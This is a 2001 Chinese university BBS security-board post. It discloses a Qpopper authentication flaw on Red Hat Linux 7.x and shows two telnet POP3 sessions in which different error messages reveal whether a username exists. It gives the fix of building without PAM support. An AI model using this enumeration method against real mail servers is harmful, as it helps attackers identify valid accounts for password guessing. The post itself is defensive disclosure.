荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: michaelx (....), 信区: Security
标 题: Qpopper 验证方式漏洞
发信站: 荔园晨风BBS站 (Sat Sep 15 13:30:50 2001), 转信
Qpopper 验证方式漏洞 (阅览 次)
涉及程序:
Qpopper
描述:
利用 Qpopper 验证方式漏洞取得用户信息
详细:
发现 Redhat Linux 7.x Qpopper 软件包验证方式上存在漏洞,攻击者利用此漏洞能取
得受影响服务器的用户信息
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22975.998689264@target.host>
user validuser
+OK Password required for validuser.
pass valid
-ERR [AUTH] PAM authentication failed for user "validuser": Authentication
failure (7)
+OK Pop server at target.host signing off.
Connection closed by foreign host.
Non-existent account:
[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22984.998689464@target.host>
user fakeuser
+OK Password required for fakeuser.
pass fakeeeee
-ERR [AUTH] Password supplied for "fakeuser" is incorrect.
+OK Pop server at target.host signing off.
Connection closed by foreign host.
解决方案:
编译 qpopper 时不使用 PAM 支持
--
M.X的FTP SERVER
有好多好野down.有过百兆的DELPHI编程资料!还有很多其他FTP无的软件。
不信就进来看看罗!
ftp://192.168.28.123
到网络安全版来玩罗,michaelx随时欢迎你!
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 203.93.19.1]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店